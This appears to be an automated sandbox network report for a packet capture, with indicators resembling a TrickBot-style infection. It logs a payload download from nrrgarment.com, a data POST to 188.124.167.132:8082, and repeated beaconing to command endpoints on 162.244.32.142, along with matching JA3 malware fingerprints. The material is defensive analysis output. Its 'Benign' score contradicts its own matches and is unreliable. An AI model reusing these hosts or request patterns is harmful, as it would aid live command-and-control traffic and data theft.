Analysis

Category Package Started Completed Duration Log
PCAP 2019-02-04 15:05:12 2019-02-04 15:05:12 0 seconds Show Log

    

MalScore

1.0

Benign


Signatures

Looks up the external IP address
domain: icanhazip.com

Hosts

Direct IP Country Name
Y 92.38.135.168 [VT] Korea, Republic of
Y 88.99.162.199 [VT] Germany
Y 84.40.112.70 [VT] Bulgaria
Y 83.163.164.15 [VT] Netherlands
Y 82.146.61.102 [VT] Russian Federation
Y 82.146.46.184 [VT] Russian Federation
Y 82.118.17.235 [VT] Ukraine
Y 78.47.14.4 [VT] Germany
Y 69.163.34.173 [VT] United States
N 69.162.69.148 [VT] United States
Y 64.137.236.236 [VT] Canada
Y 54.172.29.192 [VT] United States
Y 5.39.217.14 [VT] Netherlands
Y 40.69.62.87 [VT] Ireland
Y 37.233.102.65 [VT] Poland
N 27.254.55.15 [VT] Thailand
Y 203.59.20.119 [VT] Australia
Y 195.176.3.23 [VT] Switzerland
Y 188.124.167.132 [VT] Poland
Y 185.41.154.130 [VT] France
Y 172.104.137.234 [VT] Germany
Y 162.244.32.142 [VT] United States
Y 159.89.151.231 [VT] United States
Y 130.255.61.214 [VT] Russian Federation
Y 109.86.227.152 [VT] Ukraine
Y 109.234.39.56 [VT] Russian Federation
Y 109.234.37.227 [VT] Russian Federation
Y 109.234.35.68 [VT] Russian Federation
Y 109.234.34.220 [VT] Russian Federation

DNS

Name Response Post-Analysis Lookup
nrrgarment.com [VT] A 27.254.55.15 [VT]
icanhazip.com [VT] A 69.162.69.149 [VT]
A 69.162.69.150 [VT]
A 69.162.69.147 [VT]
A 69.162.69.148 [VT]
112.146.66.173.zen.spamhaus.org [VT] NXDOMAIN [VT]
112.146.66.173.cbl.abuseat.org [VT]
112.146.66.173.b.barracudacentral.org [VT]
112.146.66.173.dnsbl-1.uceprotect.net [VT]
112.146.66.173.spam.dnsbl.sorbs.net [VT]

Hosts

Direct IP Country Name
Y 92.38.135.168 [VT] Korea, Republic of
Y 88.99.162.199 [VT] Germany
Y 84.40.112.70 [VT] Bulgaria
Y 83.163.164.15 [VT] Netherlands
Y 82.146.61.102 [VT] Russian Federation
Y 82.146.46.184 [VT] Russian Federation
Y 82.118.17.235 [VT] Ukraine
Y 78.47.14.4 [VT] Germany
Y 69.163.34.173 [VT] United States
N 69.162.69.148 [VT] United States
Y 64.137.236.236 [VT] Canada
Y 54.172.29.192 [VT] United States
Y 5.39.217.14 [VT] Netherlands
Y 40.69.62.87 [VT] Ireland
Y 37.233.102.65 [VT] Poland
N 27.254.55.15 [VT] Thailand
Y 203.59.20.119 [VT] Australia
Y 195.176.3.23 [VT] Switzerland
Y 188.124.167.132 [VT] Poland
Y 185.41.154.130 [VT] France
Y 172.104.137.234 [VT] Germany
Y 162.244.32.142 [VT] United States
Y 159.89.151.231 [VT] United States
Y 130.255.61.214 [VT] Russian Federation
Y 109.86.227.152 [VT] Ukraine
Y 109.234.39.56 [VT] Russian Federation
Y 109.234.37.227 [VT] Russian Federation
Y 109.234.35.68 [VT] Russian Federation
Y 109.234.34.220 [VT] Russian Federation

TCP

Source Source Port Destination Destination Port
10.7.21.101 49279 109.234.34.220 443
10.7.21.101 49281 109.234.34.220 443
10.7.21.101 49391 109.234.35.68 447
10.7.21.101 49517 109.234.35.68 447
10.7.21.101 49228 109.234.37.227 443
10.7.21.101 49230 109.234.37.227 443
10.7.21.101 49237 109.234.37.227 443
10.7.21.101 49240 109.234.37.227 443
10.7.21.101 49250 109.234.37.227 443
10.7.21.101 49252 109.234.37.227 443
10.7.21.101 49254 109.234.37.227 443
10.7.21.101 49256 109.234.37.227 443
10.7.21.101 49259 109.234.37.227 443
10.7.21.101 49261 109.234.37.227 443
10.7.21.101 49263 109.234.37.227 443
10.7.21.101 49283 109.234.37.227 443
10.7.21.101 49286 109.234.37.227 443
10.7.21.101 49288 109.234.37.227 443
10.7.21.101 49290 109.234.37.227 443
10.7.21.101 49292 109.234.37.227 443
10.7.21.101 49295 109.234.37.227 443
10.7.21.101 49296 109.234.37.227 443
10.7.21.101 49297 109.234.37.227 443
10.7.21.101 49298 109.234.37.227 443
10.7.21.101 49300 109.234.37.227 443
10.7.21.101 49301 109.234.37.227 443
10.7.21.101 49302 109.234.37.227 443
10.7.21.101 49303 109.234.37.227 443
10.7.21.101 49304 109.234.37.227 443
10.7.21.101 49306 109.234.37.227 443
10.7.21.101 49307 109.234.37.227 443
10.7.21.101 49308 109.234.37.227 443
10.7.21.101 49316 109.234.37.227 443
10.7.21.101 49318 109.234.37.227 443
10.7.21.101 49326 109.234.37.227 443
10.7.21.101 49327 109.234.37.227 443
10.7.21.101 49328 109.234.37.227 443
10.7.21.101 49330 109.234.37.227 443
10.7.21.101 49331 109.234.37.227 443
10.7.21.101 49332 109.234.37.227 443
10.7.21.101 49333 109.234.37.227 443
10.7.21.101 49335 109.234.37.227 443
10.7.21.101 49336 109.234.37.227 443
10.7.21.101 49337 109.234.37.227 443
10.7.21.101 49338 109.234.37.227 443
10.7.21.101 49339 109.234.37.227 443
10.7.21.101 49341 109.234.37.227 443
10.7.21.101 49342 109.234.37.227 443
10.7.21.101 49343 109.234.37.227 443
10.7.21.101 49344 109.234.37.227 443
10.7.21.101 49346 109.234.37.227 443
10.7.21.101 49347 109.234.37.227 443
10.7.21.101 49348 109.234.37.227 443
10.7.21.101 49349 109.234.37.227 443
10.7.21.101 49351 109.234.37.227 443
10.7.21.101 49352 109.234.37.227 443
10.7.21.101 49353 109.234.37.227 443
10.7.21.101 49354 109.234.37.227 443
10.7.21.101 49355 109.234.37.227 443
10.7.21.101 49357 109.234.37.227 443
10.7.21.101 49358 109.234.37.227 443
10.7.21.101 49366 109.234.37.227 443
10.7.21.101 49367 109.234.37.227 443
10.7.21.101 49375 109.234.37.227 443
10.7.21.101 49376 109.234.37.227 443
10.7.21.101 49377 109.234.37.227 443
10.7.21.101 49378 109.234.37.227 443
10.7.21.101 49380 109.234.37.227 443
10.7.21.101 49381 109.234.37.227 443
10.7.21.101 49382 109.234.37.227 443
10.7.21.101 49383 109.234.37.227 443
10.7.21.101 49384 109.234.37.227 443
10.7.21.101 49386 109.234.37.227 443
10.7.21.101 49387 109.234.37.227 443
10.7.21.101 49392 109.234.39.56 80
10.7.21.101 49437 109.234.39.56 80
10.7.21.101 49482 109.234.39.56 80
10.7.21.101 49388 109.86.227.152 443
10.7.21.101 49389 109.86.227.152 443
10.7.21.101 49390 109.86.227.152 443
10.7.21.101 49394 109.86.227.152 443
10.7.21.101 49395 109.86.227.152 443
10.7.21.101 49396 109.86.227.152 443
10.7.21.101 49397 109.86.227.152 443
10.7.21.101 49399 109.86.227.152 443
10.7.21.101 49400 109.86.227.152 443
10.7.21.101 49401 109.86.227.152 443
10.7.21.101 49402 109.86.227.152 443
10.7.21.101 49404 109.86.227.152 443
10.7.21.101 49405 109.86.227.152 443
10.7.21.101 49406 109.86.227.152 443
10.7.21.101 49407 109.86.227.152 443
10.7.21.101 49409 109.86.227.152 443
10.7.21.101 49417 109.86.227.152 443
10.7.21.101 49418 109.86.227.152 443
10.7.21.101 49419 109.86.227.152 443
10.7.21.101 49422 109.86.227.152 443
10.7.21.101 49423 109.86.227.152 443
10.7.21.101 49424 109.86.227.152 443
10.7.21.101 49431 109.86.227.152 443
10.7.21.101 49433 109.86.227.152 443
10.7.21.101 49434 109.86.227.152 443
10.7.21.101 49435 109.86.227.152 443
10.7.21.101 49436 109.86.227.152 443
10.7.21.101 49438 109.86.227.152 443
10.7.21.101 49440 109.86.227.152 443
10.7.21.101 49441 109.86.227.152 443
10.7.21.101 49442 109.86.227.152 443
10.7.21.101 49444 109.86.227.152 443
10.7.21.101 49445 109.86.227.152 443
10.7.21.101 49446 109.86.227.152 443
10.7.21.101 49447 109.86.227.152 443
10.7.21.101 49448 109.86.227.152 443
10.7.21.101 49450 109.86.227.152 443
10.7.21.101 49451 109.86.227.152 443
10.7.21.101 49452 109.86.227.152 443
10.7.21.101 49453 109.86.227.152 443
10.7.21.101 49455 109.86.227.152 443
10.7.21.101 49456 109.86.227.152 443
10.7.21.101 49457 109.86.227.152 443
10.7.21.101 49458 109.86.227.152 443
10.7.21.101 49467 109.86.227.152 443
10.7.21.101 49468 109.86.227.152 443
10.7.21.101 49469 109.86.227.152 443
10.7.21.101 49470 109.86.227.152 443
10.7.21.101 49472 109.86.227.152 443
10.7.21.101 49473 109.86.227.152 443
10.7.21.101 49474 109.86.227.152 443
10.7.21.101 49481 109.86.227.152 443
10.7.21.101 49484 109.86.227.152 443
10.7.21.101 49485 109.86.227.152 443
10.7.21.101 49486 109.86.227.152 443
10.7.21.101 49487 109.86.227.152 443
10.7.21.101 49489 109.86.227.152 443
10.7.21.101 49490 109.86.227.152 443
10.7.21.101 49491 109.86.227.152 443
10.7.21.101 49515 109.86.227.152 443
10.7.21.101 49574 109.86.227.152 443
10.7.21.101 49575 109.86.227.152 443
10.7.21.101 49576 109.86.227.152 443
10.7.21.101 49577 109.86.227.152 443
10.7.21.101 49586 109.86.227.152 443
10.7.21.101 49220 130.255.61.214 9001
10.7.21.101 49214 159.89.151.231 9001
10.7.21.101 49492 162.244.32.142 443
10.7.21.101 49493 162.244.32.142 443
10.7.21.101 49494 162.244.32.142 443
10.7.21.101 49495 162.244.32.142 443
10.7.21.101 49496 162.244.32.142 443
10.7.21.101 49497 162.244.32.142 443
10.7.21.101 49498 162.244.32.142 443
10.7.21.101 49499 162.244.32.142 443
10.7.21.101 49500 162.244.32.142 443
10.7.21.101 49501 162.244.32.142 443
10.7.21.101 49502 162.244.32.142 443
10.7.21.101 49505 162.244.32.142 443
10.7.21.101 49506 162.244.32.142 443
10.7.21.101 49507 162.244.32.142 443
10.7.21.101 49508 162.244.32.142 443
10.7.21.101 49509 162.244.32.142 443
10.7.21.101 49510 162.244.32.142 443
10.7.21.101 49511 162.244.32.142 443
10.7.21.101 49512 162.244.32.142 443
10.7.21.101 49513 162.244.32.142 443
10.7.21.101 49514 162.244.32.142 443
10.7.21.101 49516 162.244.32.142 443
10.7.21.101 49518 162.244.32.142 443
10.7.21.101 49519 162.244.32.142 443
10.7.21.101 49520 162.244.32.142 443
10.7.21.101 49521 162.244.32.142 443
10.7.21.101 49522 162.244.32.142 443
10.7.21.101 49523 162.244.32.142 443
10.7.21.101 49524 162.244.32.142 443
10.7.21.101 49525 162.244.32.142 443
10.7.21.101 49526 162.244.32.142 443
10.7.21.101 49527 162.244.32.142 443
10.7.21.101 49528 162.244.32.142 443
10.7.21.101 49529 162.244.32.142 443
10.7.21.101 49530 162.244.32.142 443
10.7.21.101 49531 162.244.32.142 443
10.7.21.101 49532 162.244.32.142 443
10.7.21.101 49533 162.244.32.142 443
10.7.21.101 49534 162.244.32.142 443
10.7.21.101 49535 162.244.32.142 443
10.7.21.101 49536 162.244.32.142 443
10.7.21.101 49537 162.244.32.142 443
10.7.21.101 49538 162.244.32.142 443
10.7.21.101 49539 162.244.32.142 443
10.7.21.101 49540 162.244.32.142 443
10.7.21.101 49541 162.244.32.142 443
10.7.21.101 49542 162.244.32.142 443
10.7.21.101 49544 162.244.32.142 443
10.7.21.101 49545 162.244.32.142 443
10.7.21.101 49546 162.244.32.142 443
10.7.21.101 49547 162.244.32.142 443
10.7.21.101 49548 162.244.32.142 443
10.7.21.101 49549 162.244.32.142 443
10.7.21.101 49550 162.244.32.142 443
10.7.21.101 49551 162.244.32.142 443
10.7.21.101 49552 162.244.32.142 443
10.7.21.101 49553 162.244.32.142 443
10.7.21.101 49554 162.244.32.142 443
10.7.21.101 49555 162.244.32.142 443
10.7.21.101 49556 162.244.32.142 443
10.7.21.101 49557 162.244.32.142 443
10.7.21.101 49558 162.244.32.142 443
10.7.21.101 49559 162.244.32.142 443
10.7.21.101 49560 162.244.32.142 443
10.7.21.101 49561 162.244.32.142 443
10.7.21.101 49562 162.244.32.142 443
10.7.21.101 49563 162.244.32.142 443
10.7.21.101 49564 162.244.32.142 443
10.7.21.101 49565 162.244.32.142 443
10.7.21.101 49566 162.244.32.142 443
10.7.21.101 49567 162.244.32.142 443
10.7.21.101 49568 162.244.32.142 443
10.7.21.101 49569 162.244.32.142 443
10.7.21.101 49570 162.244.32.142 443
10.7.21.101 49571 162.244.32.142 443
10.7.21.101 49572 162.244.32.142 443
10.7.21.101 49573 162.244.32.142 443
10.7.21.101 49205 172.104.137.234 443
10.7.21.101 49207 172.104.137.234 443
10.7.21.101 49218 172.104.137.234 443
10.7.21.101 49221 172.104.137.234 443
10.7.21.101 49200 185.41.154.130 9001
10.7.21.101 49208 185.41.154.130 9001
10.7.21.101 49219 185.41.154.130 9001
10.7.21.101 49222 185.41.154.130 9001
10.7.21.101 49236 188.124.167.132 8082
10.7.21.101 49217 195.176.3.23 443
10.7.21.101 49212 203.59.20.119 9001
10.7.21.101 49194 27.254.55.15 nrrgarment.com 80
10.7.21.101 49204 37.233.102.65 443
10.7.21.101 49223 40.69.62.87 443
10.7.21.101 49209 5.39.217.14 443
10.7.21.101 49215 54.172.29.192 9001
10.7.21.101 49210 64.137.236.236 9001
10.7.21.101 49213 64.137.236.236 9001
10.7.21.101 49197 69.162.69.148 icanhazip.com 80
10.7.21.101 49206 69.163.34.173 443
10.7.21.101 49224 78.47.14.4 443
10.7.21.101 49201 82.118.17.235 443
10.7.21.101 49225 82.146.46.184 447
10.7.21.101 49229 82.146.61.102 447
10.7.21.101 49265 82.146.61.102 447
10.7.21.101 49203 83.163.164.15 9003
10.7.21.101 49211 84.40.112.70 9001
10.7.21.101 49216 84.40.112.70 9001
10.7.21.101 49202 88.99.162.199 9001
10.7.21.101 49198 92.38.135.168 443
10.7.21.101 49227 92.38.135.168 443

UDP

Source Source Port Destination Destination Port
10.7.21.101 49510 10.7.21.1 53
10.7.21.101 54636 10.7.21.1 53
10.7.21.101 56434 10.7.21.1 53
10.7.21.101 59200 10.7.21.1 53
10.7.21.101 59619 10.7.21.1 53
10.7.21.101 59896 10.7.21.1 53
10.7.21.101 65400 10.7.21.1 53

DNS

Name Response Post-Analysis Lookup
nrrgarment.com [VT] A 27.254.55.15 [VT]
icanhazip.com [VT] A 69.162.69.149 [VT]
A 69.162.69.150 [VT]
A 69.162.69.147 [VT]
A 69.162.69.148 [VT]
112.146.66.173.zen.spamhaus.org [VT] NXDOMAIN [VT]
112.146.66.173.cbl.abuseat.org [VT]
112.146.66.173.b.barracudacentral.org [VT]
112.146.66.173.dnsbl-1.uceprotect.net [VT]
112.146.66.173.spam.dnsbl.sorbs.net [VT]

HTTP Requests

URI Data
http://nrrgarment.com/korestros.ri
GET /korestros.ri HTTP/1.1
Host: nrrgarment.com
Connection: Keep-Alive

http://icanhazip.com/
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Host: icanhazip.com

http://188.124.167.132:8082/sat20/FLYTOME-PC_W617601.CF2A7BFD2637AD655BC1F4A8A04F0C38/90
POST /sat20/FLYTOME-PC_W617601.CF2A7BFD2637AD655BC1F4A8A04F0C38/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 4644
Cache-Control: no-cache

http://162.244.32.142:443/admin/get.php
GET /admin/get.php HTTP/1.1
Cookie: session=RfosZmJXtM+uyy7u/XfWdxa63Vg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/admin/get.php
POST /admin/get.php HTTP/1.1
Cookie: session=RfosZmJXtM+uyy7u/XfWdxa63Vg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Content-Length: 462
Connection: Keep-Alive

http://162.244.32.142:443/news.php
POST /news.php HTTP/1.1
Cookie: session=RfosZmJXtM+uyy7u/XfWdxa63Vg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Content-Length: 222
Connection: Keep-Alive

http://162.244.32.142:443/admin/get.php
GET /admin/get.php HTTP/1.1
Cookie: session=b3zMfM5jpG4esJCCKZZc6a/Lq+4=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/admin/get.php
GET /admin/get.php HTTP/1.1
Cookie: session=F6P9WuTdWzNcl5rCEeQprbwRgkQ=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/admin/get.php
GET /admin/get.php HTTP/1.1
Cookie: session=qggXDTM+JTgPG6OQlXEEY+Ojp2o=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/admin/get.php
GET /admin/get.php HTTP/1.1
Cookie: session=nQqNCStg9NqA8VgTcBxnb7prYD0=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/login/process.php
GET /login/process.php HTTP/1.1
Cookie: session=jgNHTtbl1Q25zIcxltzSqHpgqaw=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/news.php
GET /news.php HTTP/1.1
Cookie: session=EihzKD2ke5eP7OlNloBeZcsZtH0=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/login/process.php
POST /login/process.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Content-Length: 94
Connection: Keep-Alive

http://162.244.32.142:443/news.php
POST /news.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Content-Length: 158
Connection: Keep-Alive

http://162.244.32.142:443/login/process.php
GET /login/process.php HTTP/1.1
Cookie: session=ChAWT8EF2q6eaYNsisvXPPmnwCc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/login/process.php
GET /login/process.php HTTP/1.1
Cookie: session=SvsncodEgidMoHbQo0jL4wc5WXY=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

http://162.244.32.142:443/admin/get.php
GET /admin/get.php HTTP/1.1
Cookie: session=RY2UJgtqpjjjEbeJ2nTw+TNxLoc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 162.244.32.142:443
Connection: Keep-Alive

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
10.7.21.101 49279 109.234.34.220 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49281 109.234.34.220 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49391 109.234.35.68 447 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49517 109.234.35.68 447 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49228 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49230 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49237 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49240 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49250 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49252 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49254 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49256 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49259 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49261 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
10.7.21.101 49263 109.234.37.227 443 6734f37431670b3ab4292b8f60f29984 Malware Test FP: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic
